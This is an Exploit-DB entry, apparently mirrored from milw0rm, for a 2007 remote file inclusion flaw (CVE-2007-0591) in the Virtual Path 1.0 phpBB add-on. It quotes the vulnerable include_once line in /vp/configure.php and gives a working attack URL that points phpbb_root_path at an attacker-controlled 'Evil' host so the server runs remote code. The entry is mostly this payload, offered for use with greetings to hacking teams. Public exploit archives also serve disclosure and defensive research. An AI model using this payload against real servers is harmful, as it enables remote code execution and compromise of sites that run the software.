Virtual Path 1.0 - '/vp/configure.php' Remote File Inclusion

EDB-ID:

3198

CVE:

2007-0591

EDB Verified:

Author:

GoLd_M

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-01-25

Vulnerable App:

+=====================================================================
+                  Virtual Path phpBB <== v1.0                       |
+=====================================================================
+ Downlaoad S :http://sourceforge.net/projects/virtualpath/          |
+=====================================================================
+ Author: GolD_M = Mahmood_ali  &&  Contact: HackEr_@W.Cn            |
======================================================================
+ SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                    |
+=====================================================================
+ In:  /vp/configure.php                                             |
+=====================================================================
+ Vulnerable Code:  &  Line : 3                                      |
+=====================================================================
+ include_once($phpbb_root_path. 'vp/conf.php');                     |
+=====================================================================
+ Exploit:                                                           |
+=====================================================================
+ http://Victim.Com/vp/configure.php?phpbb_root_path=Evil?           |
+=====================================================================
+                    Tryag.Com & Dwrat.com                           |
+=====================================================================

# milw0rm.com [2007-01-25]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services